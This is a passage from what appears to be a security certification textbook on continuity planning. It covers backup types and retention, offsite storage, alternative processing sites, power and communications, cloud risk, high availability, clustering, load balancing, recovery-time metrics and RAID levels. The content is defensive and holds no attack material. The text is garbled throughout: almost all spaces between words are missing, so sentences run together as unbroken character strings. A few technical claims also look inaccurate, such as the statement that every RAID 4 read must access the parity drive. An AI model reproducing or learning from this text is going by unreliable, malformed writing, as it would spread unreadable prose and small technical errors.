sincethelastfullbackupwascompletedarebackedup.Thisalsoimpliesthatperiodicallyafullbackupneedstobeaccomplished.Thefrequencyofthefullbackupversustheinterimdifferentialbackupsdependsonyourorganizationandneedstobepartofyourdefinedstrategy.Restorationfromadifferentialbackuprequirestwosteps:thelastfullbackupfirstneedstobeloaded,andthenthelastdifferentialbackupperformedcanbeappliedtoupdatethefilesthathavebeenchangedsincethefullbackupwasconducted.Again,thisisnotadifficultprocess,butitdoestakesometime.Theamountoftimetoaccomplishtheperiodicdifferentialbackup,however,ismuchlessthanthatforafullbackup,andthisisoneoftheadvantagesofthismethod.Obviously,ifalotoftimehaspassedbetweendifferentialbackups,orifmostfilesinyourenvironmentchangefrequently,thenthedifferentialbackupdoesnotdiffermuchfromafullbackup.Itshouldalsobeobviousthattoaccomplishthedifferentialbackup,thesystemhastohaveamethodtodeterminewhichfileshavebeenchangedsincesomegivenpointintime.Thearchivebitisnotclearedinadifferentialbackupsincethekeyforadifferentialistobackupallfilesthathavechangedsincethelastfullbackup.Withincrementalbackups,evenlessinformationwillbestoredineach
backup.Theincrementalbackupisavariationonadifferentialbackup,withthedifferencebeingthatinsteadofcopyingallfilesthathavechanged
sincethelastfullbackup,theincrementalbackupbacksuponlyfilesthathavechangedsincethelastfullorincrementalbackupoccurred,thusrequiringfewerfilestobebackedup.Justasinthecaseofthedifferentialbackup,theincrementalbackupreliesontheoccasionalfullbackupbeingaccomplished.Afterthat,youbackuponlyfilesthathavechangedsincethelastbackupofanysortwasconducted.Torestoreasystemusingthistypeofbackupmethodrequiresquiteabitmorework.Youfirstneedtogobacktothelastfullbackupandreloadthesystemwiththisdata.Thenyouhavetoupdatethesystemwitheveryincrementalbackupthathasoccurredsincethefullbackup.Theadvantageofthistypeofbackupisthatitrequireslessstorageandtimetoaccomplish.Thedisadvantageisthattherestorationprocessismoreinvolved.Assumingthatyoudon’tfrequentlyhavetoconductacompleterestorationofyoursystem,however,theincrementalbackupisavalidtechnique.Anincrementalbackupwillclearthearchivebit.Finally,thegoalofthedeltabackupistobackupaslittleinformation
aspossibleeachtimeyouperformabackup.Aswiththeotherstrategies,anoccasionalfullbackupmustbeaccomplished.Afterthat,whenadeltabackupisconductedatspecificintervals,onlytheportionsofthefilesthathavebeenchangedwillbestored.Theadvantageofthisiseasytoillustrate.Ifyourorganizationmaintainsalargedatabasewiththousandsofrecordscomprisingseveralhundredmegabytesofdata,theentiredatabasewouldbecopiedinthepreviousbackuptypesevenifonlyonerecordhaschanged.Foradeltabackup,onlytheactualrecordthatchangedwouldbestored.Thedisadvantageofthismethodisthatrestorationisacomplexprocess,becauseitrequiresmorethanjustloadingafile(orseveralfiles).Itrequiresthatapplicationsoftwareberuntoupdatetherecordsinthefilesthathavebeenchanged.Therearesomenewerbackupmethodsthataresimilartodeltabackups
inthattheyminimizewhatisbackedup.Therearereal-timeornear-real-timebackupstrategies,suchasjournaling,transactionalbackups,andelectronicvaulting,thatcanprovideprotectionagainstlossinreal-timeenvironments.Implementingthesemethodsintoanoverallbackupstrategy
canincreaseoptionsandflexibilityduringtimesofrecovery.
ExamTip:Youneedtomakesureyouunderstandthedifferenttypesofbackupsandtheiradvantagesanddisadvantagesfortheexam.
Eachtypeofbackuphasadvantagesanddisadvantages.Whichtypeisbestforyourorganizationdependsontheamountofdatayouroutinelyprocessandstore,howfrequentlythedatachanges,howoftenyouexpecttohavetorestorefromabackup,andanumberofotherfactors.Thetypeyouselectwillshapeyouroverallbackupstrategyandprocesses.
BackupFrequencyandRetentionThetypeofbackupstrategyanorganizationemploysisoftenaffectedbyhowfrequentlytheorganizationconductsthebackupactivity.Theusefulnessofabackupisdirectlyrelatedtohowmanychangeshaveoccurredsincethebackupwascreated,andthisisobviouslyaffectedbyhowoftenbackupsarecreated.Thelongerithasbeensincethebackupwascreated,themorechangesthatlikelywillhaveoccurred.Thereisnoeasyanswer,however,tohowfrequentlyanorganizationshouldperformbackups.Everyorganizationshouldconsiderhowlongitcansurvivewithoutcurrentdatafromwhichtooperate.Itcanthendeterminehowlongitwilltaketorestorefrombackups,usingvariousmethods,anddecidehowfrequentlybackupsneedtooccur.Thissoundssimple,butitisaserious,complexdecisiontomake.
TechTip
DeterminingHowLongtoMaintainBackupsDeterminingthelengthoftimethatyouretainyourbackupsshouldnotbebasedonthefrequencyofyourbackups.Themoreoftenyouconductbackupoperations,themoredatayou
willhave.Youmightbetemptedtotrimthenumberofbackupsretainedtokeepstoragecostsdown,butyouneedtoevaluatehowlongyouneedtoretainbackupsbasedonyouroperationalenvironmentandthenkeeptheappropriatenumberofbackups.
Relatedtothefrequencyquestionistheissueofhowlongbackupsshouldbemaintained.Isitsufficienttosimplymaintainasinglebackupfromwhichtorestoredata?Securityprofessionalswilltellyouno;multiplebackupsshouldbemaintained,foravarietyofreasons.Ifthereasonforrestoringfromthebackupisthediscoveryofanintruderinthesystem,itisimportanttorestorethesystemtoitspre-intrusionstate.Iftheintruderhasbeeninthesystemforseveralmonthsbeforebeingdiscovered,andbackupsaretakenweekly,itwillnotbepossibletorestoretoapre-intrusionstateifonlyonebackupismaintained.Thiswouldmeanthatalldataandsystemfileswouldbesuspectandmaynotbereliable.Ifmultiplebackupsweremaintained,atvariousintervals,thenitiseasiertoreturntoapointbeforetheintrusion(orbeforethesecurityoroperationaleventthatisnecessitatingtherestoration)occurred.Thereareseveralstrategiesorapproachestobackupretention.One
commonandeasy-to-rememberstrategyisthe“ruleofthree,”inwhichthethreemostrecentbackupsarekept.Whenanewbackupiscreated,theoldestbackupisoverwritten.Anotherstrategyistokeepthemostrecentcopyofbackupsforvarioustimeintervals.Forexample,youmightkeepthelatestdaily,weekly,monthly,quarterly,andyearlybackups.Notethatincertainenvironments,regulatoryissuesmayprescribeaspecificfrequencyandretentionperiod,soitisimportanttoknowyourorganization’srequirementswhendetermininghowoftenyouwillcreateabackupandhowlongyouwillkeepit.Ifyouarenotinanenvironmentforwhichregulatoryissuesdictatethe
frequencyandretentionforbackups,yourgoalwillbetooptimizethefrequency.Indeterminingtheoptimalbackupfrequency,twomajorcostsneedtobeconsidered:thecostofthebackupstrategyyouchooseandthecostofrecoveryifyoudonotimplementthisbackupstrategy(thatis,ifnobackupswerecreated).Youmustalsofactorintothisequationtheprobabilitythatthebackupwillbeneededonanygivenday.Thetwo
figurestoconsiderthenarethese:
Alternative1:(probabilitythebackupisneeded)×(costofrestoringwithnobackup)Alternative2:(probabilitythebackupisn’tneeded)×(costofthebackupstrategy)
Thefirstofthesetwofigures,alternative1,canbeconsideredtheprobablelossyoucanexpectifyourorganizationhasnobackup.Thesecondfigure,alternative2,canbeconsideredtheamountyouarewillingtospendtoensurethatyoucanrestore,shouldaproblemoccur(thinkofthisasbackupinsurance—thecostofaninsurancepolicythatmayneverbeusedbutthatyouarewillingtopayfor,justincase).Forexample,iftheprobabilityofabackupbeingneededis10percent,andthecostofrestoringwithnobackupis$100,000,thenthefirstequationwouldyieldafigureof$10,000.Thiscanbecomparedwiththealternative,whichwouldbea90percentchancethebackupisnotneededmultipliedbythecostofimplementingyourbackupstrategy(oftakingandmaintainingthebackups),whichis,say,$10,000annually.Thesecondequationyieldsafigureof$9000.Inthisexample,thecostofmaintainingthebackupislessthanthecostofnothavingbackups,sotheformerwouldbethebetterchoice.Whileconceptuallythisisaneasytrade-offtounderstand,inrealityitisoftendifficulttoaccuratelydeterminetheprobabilityofabackupbeingneeded.Fortunately,thefiguresforthepotentiallossifthereisnobackupare
generallysomuchgreaterthanthecostofmaintainingabackupthatamistakeinjudgingtheprobabilitywillnotmatter—itjustmakestoomuchsensetomaintainbackups.Thisexamplealsousesastraightcomparisonbasedsolelyonthecostoftheprocessofrestoringwithandwithoutabackupstrategy.Whatneedstobeincludedinthecostofbothoftheseisthelossthatoccurswhiletheassetisnotavailableasitisbeingrestored—inessence,ameasurementofthevalueoftheassetitself.Tooptimizeyourbackupstrategy,youneedtodeterminethecorrect
balancebetweenthesetwofigures.Obviously,youdonotwanttospendmoreinyourbackupstrategythanyoufacelosingshouldyounothaveabackupplanatall.Whenworkingwiththesetwocalculations,youhavetorememberthatthisisacost-avoidanceexercise.Theorganizationisnotgoingtoincreaserevenueswithitsbackupstrategy.Thegoalistominimizethepotentiallossduetosomecatastrophiceventbycreatingabackupstrategythatwilladdressyourorganization’sneeds.Whenyou’recalculatingthecostofthebackupstrategy,considerthe
following:
Thecostofthebackupmediarequiredforasinglebackup
Thestoragecostsforthebackupmediabasedontheretentionpolicy
Thelaborcostsassociatedwithperformingasinglebackup
Thefrequencywithwhichbackupsarecreated
Alloftheseconsiderationscanbeusedtoarriveatanannualcostforimplementingyourchosenbackupstrategy,andthisfigurecanthenbeusedaspreviouslydescribed.
TechTip
OnsiteBackupStorageOneofthemostfrequenterrorscommittedwithbackupsistostoreallbackupsonsite.Whilethisgreatlysimplifiestheprocess,itmeansthatalldataisstoredinthesamefacility.Shouldanaturaldisasteroccur(suchasafireorhurricane),youcouldlosenotonlyyourprimarydatastoragedevicesbutyourbackupsaswell.Youneedtouseanoffsitelocationtostoreatleastsomeofyourbackups.
StorageofBackupsAnimportantelementtofactorintothecostofthebackupstrategyistheexpenseofstoringthebackups.Asimplestrategymightbetostoreall
yourbackupstogetherforquickandeasyrecoveryactions.Thisisnot,however,agoodidea.Supposethecatastrophiceventthatnecessitatedtherestorationofbacked-updatawasafirethatdestroyedthecomputersystemthedatawasprocessedon.Inthiscase,anybackupsthatwerestoredinthesamefacilitymightalsobelostinthesamefire.Thesolutionistokeepcopiesofbackupsinseparatelocations.The
mostrecentcopycanbestoredlocally,asitisthemostlikelytobeneeded,whileothercopiescanbekeptatotherlocations.Dependingonthelevelofsecurityyourorganizationdesires,thestoragefacilityitselfcouldbereinforcedagainstpossiblethreatsinyourarea(suchastornadosorfloods).Amorerecentadvanceisonlinebackupservices.Anumberofthird-partycompaniesofferhigh-speedconnectionsforstoringdatainaseparatefacility.Transmittingthebackupdatavianetworkconnectionsalleviatessomeotherissueswithphysicalmovementofmoretraditionalstoragemedia,suchascareduringtransportation(tapesdonotfarewellindirectsunlight,forexample)orthetimethatittakestotransportthetapes.
TechTip
Long-TermBackupStorageAneasyfactortooverlookwhenupgradingsystemsiswhetherlong-termbackupswillstillbeusable.Youneedtoensurethatthetypeofmediautilizedforyourlong-termstorageiscompatiblewiththehardwarethatyouareupgradingto.Otherwise,youmayfindyourselfinasituationinwhichyouneedtorestoredata,andyouhavethedata,butyoudon’thaveanywaytorestoreit.
IssueswithLong-TermStorageofBackupsDependingonthemediausedforanorganization’sbackups,degradationofthemediaisadistinctpossibilityandneedstobeconsidered.Magneticmediadegradesovertime(measuredinyears).Inaddition,tapescanbeusedalimitednumberoftimesbeforethesurfacebeginstoflakeoff.Magneticmediashouldthusberotatedandtestedtoensurethatitisstill
usable.Anotherconsiderationisadvancesintechnology.Themediayouusedto
storeyourdatatwoyearsagomaynowbeconsideredobsolete(5.25-inchfloppydisks,forexample).Softwareapplicationsalsoevolve,andthemediamaybepresentbutmaynotbecompatiblewithcurrentversionsofthesoftware.Thismaymeanthatyouneedtomaintainbackupcopiesofbothhardwareandsoftwareinordertorecoverfromolderbackupmedia.Anotherissueissecurityrelated.Ifthefileyoustoredwasencryptedfor
securitypurposes,doesanybodyinthecompanyrememberthepasswordtodecryptthefiletorestorethedata?Morethanoneemployeeinthecompanyshouldknowthekeytodecryptthefiles,andthisinformationshouldbepassedalongtoanotherpersonwhenacriticalemployeewiththatinformationleaves,isterminated,ordies.
AlternativeSitesAnissuerelatedtothelocationofbackupstorageiswheretherestorationserviceswillbeconducted.Determinationofwhenorifanalternativesiteisneededshouldbeincludedinrecoveryandcontinuityplans.Iftheorganizationhassufferedphysicaldamagetoafacility,havingoffsitestorageofdataisonlypartofthesolution.Thisdatawillneedtobeprocessedsomewhere,whichmeansthatcomputingfacilitiessimilartothoseusedinnormaloperationsarerequired.Thereareanumberofwaystoapproachthisproblem,includinghotsites,warmsites,coldsites,andmobilebackupsites.Ahotsiteisafullyconfiguredenvironmentthatissimilartothenormal
operatingenvironmentandthatcanbeoperationalimmediatelyorwithinafewhours,dependingonitsconfigurationandtheneedsoftheorganization.Awarmsiteispartiallyconfigured,usuallyhavingtheperipheralsandsoftwarebutperhapsnotthemoreexpensivemainprocessingcomputer.Itisdesignedtobeoperationalwithinafewdays.Acoldsitehasthebasicenvironmentalcontrolsnecessarytooperatebuthasfewofthecomputingcomponentsnecessaryforprocessing.Gettingacold
siteoperationalmaytakeweeks.Amobilebackupsitegenerallyisatrailerwiththerequiredcomputersandelectricalpowerthatcanbedriventoalocationwithinhoursofadisasterandsetuptocommenceprocessingimmediately.
ExamTip:Understandingthedifferencesbetweenhot,warm,andcoldsitesisfundamentaltounderstandingdifferentbusinesscontinuitystrategies.Makesurethatyouunderstandthesimpledifferencesbetweenthesesites,theprimaryofwhichishowsoonthealternativesitecanbeginprocessingyourorganization’swork.
Sharedalternatesitesmayalsobeconsidered.Thesesitescanbedesignedtohandletheneedsofdifferentorganizationsintheeventofanemergency.Thehopeisthatthedisasterwillaffectonlyoneorganizationatatime.Thebenefitofthismethodisthatthecostofthesitecanbesharedamongorganizations.Twosimilarorganizationslocatedclosetoeachshouldnotsharethesamealternatesiteasthereisagreaterchancethattheywouldbothneeditatthesametime.
TryThis!ResearchAlternativeProcessingSitesThereisanindustrybuiltuponprovidingalternativeprocessingsitesincaseofadisasterofsomesort.UsingtheInternetorotherresources,determinewhatresourcesareavailableinyourareaforhot,warm,andcoldsites.Doyouliveinanareainwhichalotoftheseservicesareoffered?Dootherareasofthecountryhavemorealternativeprocessingsitesavailable?Whatmakeswhereyouliveabetterorworseplaceforalternativesites?
Alloftheseoptionscancomewithaconsiderablepricetag,whichmakesanotheroption,mutualaidagreements,apossiblealternative.Withamutualaidagreement,similarorganizationsagreetoassumetheprocessingfortheotherpartyintheeventadisasteroccurs.Thisissometimesreferredtoasareciprocalsite.Theobviousassumptionhereis
thatbothorganizationswillnotbehitbythesamedisasterandthatbothhavesimilarprocessingenvironments.Ifthesetwoassumptionsarecorrect,thenamutualaidagreementshouldbeconsidered.Suchanarrangementmaynotbelegallyenforceable,evenifitisinwriting,andorganizationsmustconsiderthiswhendevelopingtheirdisasterplans.Inaddition,iftheorganizationthatthemutualaidagreementismadewithalsoishitbythesamedisaster,thenbothorganizationswillbeintrouble.Additionalcontingenciesneedtobeplannedforevenifamutualaidagreementismadewithanotherorganization.Therearealsotheobvioussecurityconcernsthatmustbeconsideredwhenhavinganotherorganizationassumeyourorganization’sprocessing.
UtilitiesTheinterruptionofpowerisacommonissueduringadisaster.Computersandnetworksobviouslyrequirepowertooperate,soemergencypowermustbeavailableintheeventofanydisruptionofoperations.Forshort-terminterruptions,suchaswhatmightoccurastheresultofanelectricalstorm,uninterruptiblepowersupplies(UPSs)maysuffice.Thesedevicescontainabatterythatprovidessteadypowerforshortperiodsoftime—enoughtokeepasystemrunningshouldpoweronlybelostforafewminutes,enoughtimetoallowadministratorstogracefullyhaltthesystemornetwork.Forcontinuedoperationsthatextendbeyondafewminutes,anothersourceofpowerwillberequired.Generallythisisprovidedbyabackupemergencygenerator.Whilebackupgeneratorsarefrequentlyusedtoprovidepowerduringan
emergency,theyarenotasimple,maintenance-freesolution.Generatorsneedtobetestedonaregularbasis,andtheycaneasilybecomestrainediftheyarerequiredtopowertoomuchequipment.Ifyourorganizationisgoingtorelyonanemergencygeneratorforbackuppower,youmustensurethatthesystemhasreservecapacitybeyondtheanticipatedloadfortheunanticipatedloadsthatwillundoubtedlybeplacedonit.Generatorsalsotaketimetostartup,sopowertoyourorganizationwill
mostlikelybelost,evenifonlybriefly,untilthegeneratorskickin.ThismeansthatyoushouldalsouseaUPStoallowforasmoothtransitiontobackuppower.Generatorsarealsoexpensiveandrequirefuel—whenlookingforaplacetolocateyourgenerator,don’tforgettheneedtodeliverfueltoitoryoumayfindyourselfhaulingcansoffuelupanumberofstairs.Whendeterminingtheneedforbackuppower,don’tforgettofactorin
environmentalconditions.Runningcomputersystemsinaroomwithnoairconditioninginthemiddleofthesummercanresultinanextremelyuncomfortableenvironmentforalltoworkin.Mobilebackupsites,generallyusingtrailers,oftenrelyongeneratorsfortheirpowerbutalsofactorintherequirementforenvironmentalcontrols.Powerisnottheonlyessentialutilityforoperations.Dependingonthe
typeofdisasterthathasoccurred,telephoneandInternetcommunicationmayalsobelost,andwirelessservicesmaynotbeavailable.Planningforredundantmeansofcommunication(suchasusingbothlandlinesandwireless)canhelpwithmostoutages,butforlargedisasters,yourbackupplansshouldincludetheoptiontocontinueoperationsfromacompletelydifferentlocationwhilewaitingforcommunicationsinyourareatoberestored.Telecommunicationcarriershavetheirownemergencyequipmentandarefairlyefficientatrestoringcommunications,butitmaytakeafewdays.
SecureRecoverySeveralcompaniesofferrecoveryservices,includingpower,communications,andtechnicalsupportthatyourorganizationmayneedifitsoperationsaredisrupted.Thesecompaniesadvertisesecurerecoverysitesorofficesfromwhichyourorganizationcanagainbegintooperateinasecureenvironment.Securerecoveryisalsoadvertisedbyotherorganizationsthatprovideservicesthatcanremotely(overtheInternet,forexample)providerestorationservicesforcriticalfilesanddata.Inbothcases—theactualphysicalsuitesandtheremoteservice—
securityisanimportantelement.Duringadisaster,yourdatadoesnotbecomeanylessimportant,andyouwillwanttomakesurethatyoumaintainthesecurity(intermsofconfidentialityandintegrity,forexample)ofyourdata.Asinotheraspectsofsecurity,thedecisiontoemploytheseservicesshouldbemadebasedonacalculationofthebenefitsweighedagainstthepotentiallossifalternativemeansareused.
CloudComputingOneofthenewerinnovationscomingtocomputingviatheInternetistheconceptofcloudcomputing.Insteadofowningandoperatingadedicatedsetofserversforcommonbusinessfunctionssuchasdatabaseservices,filestorage,e-mailservices,andsoforth,anorganizationcancontractwiththirdpartiestoprovidetheseservicesovertheInternetfromtheirserverfarms.ThisiscommonlyreferredtoasInfrastructureasaService(IaaS).Theconceptisthatoperationsandmaintenanceisanactivitythathasbecomeacommodity,andtheInternetprovidesareliablemechanismtoaccessthismoreeconomicalformofoperationalcomputing.Pushingcomputingintothecloudmaymakegoodbusinesssensefroma
costperspective,butdoingsodoesnotchangethefactthatyourorganizationisstillresponsibleforensuringthatalltheappropriatesecuritymeasuresareproperlyinplace.Howarebackupsbeingperformed?Whatplanisinplacefordisasterrecovery?Howfrequentlyaresystemspatched?Whatistheservicelevelagreement(SLA)associatedwiththesystems?Itiseasytoignorethedetailswhenoutsourcingthesecriticalyetcostlyelements,butwhensomethingbadoccurs,youmusthaveconfidencethattheappropriatelevelofprotectionshasbeenapplied.Thesearetheseriousquestionsanddifficultissuestoresolvewhenmovingcomputingintothecloud—locationmaychange,butresponsibilityandtechnicalissuesarestillthereandformtheriskofthesolution.
TechTip
TheSidekickFailureof2009InOctober2009,manyT-MobileSidekickusersdiscoveredthattheircontacts,calendars,to-dolists,andphotoswerelostwhencloud-basedserverslosttheirdata.Notalluserswereaffectedbytheserverfailure,butforthosethatwere,thelosswascomplete.T-MobilequicklypointedthefingeratMicrosoft,whohadacquiredinFebruary2008thesmallstartupcompany,Danger,whichbuiltthecloud-basedsystemforT-Mobile.Toendusers,thistransactionwascompletelytransparent.Intheend,alotofuserslosttheirdata,andwereoffereda$100creditbyT-Mobileagainsttheirbill.Regardlessofwheretheblamelands,theaffectedendusermuststillfaceasimplequestion:didtheyconsidertheimportanceofbackup?Iftheinformationontheirphonewascritical,didtheyperformalocalbackup?Ordidtheyassumethatthecloudandlargecorporationstheycontractedwithdiditforthem?
HighAvailabilityandFaultToleranceSomeothertermsthatmaybeusedindiscussionsofcontinuityofoperationsinthefaceofadisruptionofsomesortarehighavailabilityandfaulttolerance.Oneoftheobjectivesofsecurityistheavailabilityofdataand
processingpowerwhenanauthorizeduserdesiresit.Highavailabilityreferstotheabilitytomaintainavailabilityofdataandoperationalprocessingdespiteadisruptingevent.Generallythisrequiresredundantsystems,intermsofbothpowerandprocessing,sothatshouldonesystemfail,theothercantakeoveroperationswithoutanybreakinservice.Highavailabilityismorethandataredundancy;itrequiresthatbothdataandservicesbeavailable.Faulttolerancebasicallyhasthesamegoalashighavailability—the
uninterruptedaccesstodataandservices—andisaccomplishedbythemirroringofdataandsystems.Shoulda“fault”occur,causingdisruptioninadevicesuchasadiskcontroller,themirroredsystemprovidestherequesteddatawithnoapparentinterruptioninservicetotheuser.Highavailabilityclusteringisanothermethodusedtoprovideredundancyincriticalsituations.Theseclustersconsistofadditionalcomputersupon
whichacriticalprocesscanbestartediftheclusterdetectsthattherehasbeenahardwareorsoftwareproblemonthemainsystem.
ExamTip:Faulttoleranceandhighavailabilityaresimilarintheirgoals,yettheyareseparateinapplication.Highavailabilityreferstomaintainingbothdataandservicesinanoperationalstateevenwhenadisruptingeventoccurs.Faulttoleranceisadesignobjectivetoachievehighavailabilityshouldafaultoccur.
Certainsystems,suchasservers,aremorecriticaltobusinessoperationsandshould,therefore,betheobjectoffault-tolerancemeasures.Acommontechniqueusedinfaulttoleranceisloadbalancing.Anothercloselyrelatedtechniqueisclustering.Bothtechniquesarediscussedinthefollowingsections.
ExamTip:Redundancyisanimportantfactorinbothsecurityandreliability.Makesureyouunderstandhowasystemcanbenefitfromredundantcomponents.
Obviously,providingredundantsystemsandequipmentcomeswithaprice,andtheneedtoprovidethislevelofcontinuous,uninterruptedoperationneedstobecarefullyevaluated.
TechTip
UptimeMetricsBecauseuptimeiscritical,itiscommontomeasureuptime(or,conversely,downtime)andusethismeasuretodemonstratereliability.Acommonmeasureforthishasbecomethemeasureof“9s,”asin99percentuptime,99.99percentuptime,andsoon.Whensomeonerefersto“fivenines”asameasure,thisgenerallymeans99.999percentuptime.Expressingthisinotherterms,fiveninesofuptimecorrelatestolessthanfiveandahalfminutesofdowntimeperyear.Sixninesis31secondsofdowntimeperyear.Oneimportantnoteisthat
uptimeisnotthesameasavailability,forsystemscanbeupbutnotavailableforreasonsofnetworkoutage,sobesureyouunderstandwhatisbeingcounted.
ClusteringClusteringlinksagroupofsystemstohavethemworktogether,functioningasasinglesystem.Inmanyrespects,aclusterofcomputersworkingtogethercanbeconsideredasinglelargercomputer,withtheadvantageofcostinglessthanasinglecomparablypowerfulcomputer.Aclusteralsohasthefault-tolerantadvantageofnotbeingreliantonanysinglecomputersystemforoverallsystemperformance.
LoadBalancingLoadbalancingisdesignedtodistributetheprocessingloadovertwoormoresystems.Itisusedtohelpimproveresourceutilizationandthroughputbutalsohastheaddedadvantageofincreasingthefaulttoleranceoftheoverallsystem,becauseacriticalprocessmaybesplitacrossseveralsystems.Shouldanyonesystemfail,theotherscanpickuptheprocessingitwashandling.Whiletheremaybeanimpacttooverallthroughput,theoperationdoesnotgodownentirely.Loadbalancingisoftenutilizedforsystemsthathandlewebsitesandhigh-bandwidthfiletransfers.
SinglePointofFailureRelatedtothetopicofhighavailabilityistheconceptofasinglepointoffailure.Asinglepointoffailureisacriticaloperationintheorganizationuponwhichmanyotheroperationsrelyandwhichitselfreliesonasingleitemthat,iflost,wouldhaltthiscriticaloperation.Asinglepointoffailurecanbeaspecialpieceofhardware,aprocess,aspecificpieceofdata,orevenanessentialutility.Singlepointsoffailureneedtobeidentifiedifhighavailabilityisrequiredbecausetheyarepotentiallythe“weaklinks”inthechainthatcancausedisruptionoftheorganization’soperations.Generally,thesolutiontoasinglepointoffailureistomodifythecritical
operationsothatitdoesnotrelyonthissingleelementortobuildredundantcomponentsintothecriticaloperationtotakeovertheprocessshouldoneofthesepointsfail.
ExamTip:Understandthevariouswaysthatasinglepointoffailurecanbeaddressed,includingthevarioustypesofredundancyandhighavailabilityclusters.
Inadditiontotheinternalresourcesyouneedtoconsiderwhenevaluatingyourbusinessfunctions,therearemanyexternalresourcesthatcanimpacttheoperationofyourbusiness.Youmustlookbeyondhardware,software,anddatatoconsiderhowthelossofvariouscriticalinfrastructurescanalsoimpactbusinessoperations.ThetypeofinfrastructuresyoushouldconsiderinyourBCPisthesubjectofthenextsection.
FailureandRecoveryTimingSeveralimportantconceptsareinvolvedintheissueoffaulttoleranceandsystemrecovery.Thefirstismeantimetofailure(ormeantimebetweenfailures).Thistermreferstothepredictedaveragetimethatwillelapsebeforefailure(orbetweenfailures)ofasystem(generallyreferringtohardwarecomponents).Knowingwhatthistimeisforhardwarecomponentsofvariouscriticalsystemscanhelpanorganizationplanformaintenanceandequipmentreplacement.
TechTip
LoadBalancing,Clusters,FarmsAclusterisagroupofserversdeployedtoachieveacommonobjective.Clusteredserversareawareofoneanotherandhaveamechanismtoexchangetheirstates,soeachserver’sstateis
replicatedtotheotherclusteredservers.Loadbalancingisamechanismwheretrafficisdirectedtoidenticalserversbasedonavailability.Inloadbalancing,theserversarenotawareofthestateofotherservers.Forpurposesofload,itisnotuncommontohavealoadbalancerdistributerequeststoclusteredservers.Databaseserversaretypicallyclustered,astheintegrityofthedatastructurerequiresall
copiestobeidentical.Webserversandothercontentdistributionmechanismscanuseloadbalancingalonewhenevermaintainingstatechangesisnotnecessaryacrosstheenvironment.Aserverfarmisagroupofrelatedserversinonelocationservinganenterprise.Itcanbeeitherclustered,loadbalanced,orboth.
Asecondimportantconcepttounderstandismeantimetorestore(ormeantimetorecovery).Thistermreferstotheaveragetimethatitwilltaketorestoreasystemtooperationalstatus(torecoverfromanyfailure).Knowingwhatthistimeisforcriticalsystemsandprocessesisimportanttodevelopingeffective,andrealistic,recoveryplans,includingDRP,BCP,andbackupplans.Thelasttwoconceptsarecloselytied.Aspreviouslydescribed,the
recoverytimeobjectiveisthegoalanorganizationsetsforthetimewithinwhichitwantstohaveacriticalservicerestoredafteradisruptioninserviceoccurs.Itisbasedonthecalculationofthemaximumamountoftimethatcanoccurbeforeunacceptablelossestakeplace.Alsocoveredwastherecoverypointobjective,whichisbasedonadeterminationofhowmuchdatalossanorganizationcanwithstand.Takentogether,thesefourconceptsareimportantconsiderationsforan
organizationdevelopingitsvariouscontingencyplans.HavingRTOandRPOthatareshorterthantheMTTRcanresultinlosses.Andattemptingtolowerthemeantimebetweenfailuresortherecoverytimeobjectivesbelowwhatisrequiredbytheorganizationwastesmoneythatcouldbebetterspentelsewhere.Thekeyisinunderstandingthesefiguresandbalancingthem.
BackoutPlanningAnissuerelatedtobackupsistheissueofreturningtoanearlierreleaseofasoftwareapplicationintheeventthatanewreleasecauseseitherapartialorcompletefailure.Planningforsuchaneventisreferredtoasbackout
planning.Theseplansshouldaddressbothapartialorfullreturntopreviousreleasesofsoftware.Sadly,thissortofeventismorefrequentthanmostwouldsuspect.Thereasonforthisistheinterdependenceofvariousaspectsofasystem.Itisnotuncommonforonepieceofsoftwaretotakeadvantageofsomefeatureofanother.Shouldthisfeaturechangeinanewrelease,anothercriticaloperationmaybeimpacted.
RAIDOnepopularapproachtoincreasingreliabilityindiskstorageisRedundantArrayofIndependentDisks(RAID)(previouslyknownasRedundantArrayofInexpensiveDisks).RAIDtakesdatathatisnormallystoredonasinglediskandspreadsitoutamongseveralothers.Ifanysinglediskislost,thedatacanberecoveredfromtheotherdiskswherethedataalsoresides.Withthepriceofdiskstoragedecreasing,thisapproachhasbecomeincreasinglypopulartothepointthatmanyindividualusersevenhaveRAIDarraysfortheirhomesystems.RAIDcanalsoincreasethespeedofdatarecovery,asmultipledrivescanbebusyretrievingrequesteddataatthesametimeinsteadofrelyingonjustonedisktodothework.SeveraldifferentRAIDapproachescanbeconsidered:
RAID0(stripeddisks)simplyspreadsthedatathatwouldbekeptontheonediskacrossseveraldisks.Thisdecreasesthetimeittakestoretrievedata,becausethedataisreadfrommultipledrivesatthesametime,butitdoesnotimprovereliability,becausethelossofanysingledrivewillresultinthelossofallthedata(sinceportionsoffilesarespreadoutamongthedifferentdisks).WithRAID0,thedataissplitacrossallthedriveswithnoredundancyoffered.
RAID1(mirroreddisks)istheoppositeofRAID0.RAID1copiesthedatafromonediskontotwoormoredisks.Ifanysinglediskislost,thedataisnotlostsinceitisalsocopiedontotheotherdisk(s).Thismethodcanbeusedtoimprovereliabilityandretrievalspeed,butitisrelativelyexpensivewhencomparedtootherRAIDtechniques.
RAID2(bit-levelerror-correctingcode)isnottypicallyused,asitstripesdataacrossthedrivesatthebitlevelasopposedtotheblocklevel.Itisdesignedtobeabletorecoverthelossofanysinglediskthroughtheuseoferror-correctingtechniques.
RAID3(byte-stripedwitherrorcheck)spreadsthedataacrossmultipledisksatthebytelevelwithonediskdedicatedtoparitybits.Thistechniqueisnotcommonlyimplemented,becauseinput/outputoperationscan’tbeoverlappedduetotheneedforalltoaccessthesamedisk(thediskwiththeparitybits).
RAID4(dedicatedparitydrive)stripesdataacrossseveraldisksbutinlargerstripesthaninRAID3,anditusesasingledriveforparity-basederrorchecking.RAID4hasthedisadvantageofnotimprovingdataretrievalspeeds,sinceallretrievalsstillneedtoaccessthesingleparitydrive.
RAID5(block-stripedwitherrorcheck)isacommonlyusedmethodthatstripesthedataattheblocklevelandspreadstheparitydataacrossthedrives.Thisprovidesbothreliabilityandincreasedspeedperformance.Thisformrequiresaminimumofthreedrives.
RAID0through5aretheoriginaltechniques,withRAID5beingthemostcommonmethodused,asitprovidesboththereliabilityandspeedimprovements.Additionalmethodshavebeenimplemented,suchasduplicatingtheparitydataacrossthedisks(RAID6)andastripeofmirrors(RAID10).
ExamTip:KnowledgeofthebasicRAIDstructuresbynumberdesignationisatestableelementandshouldbememorizedfortheexam.
SparePartsandRedundancy
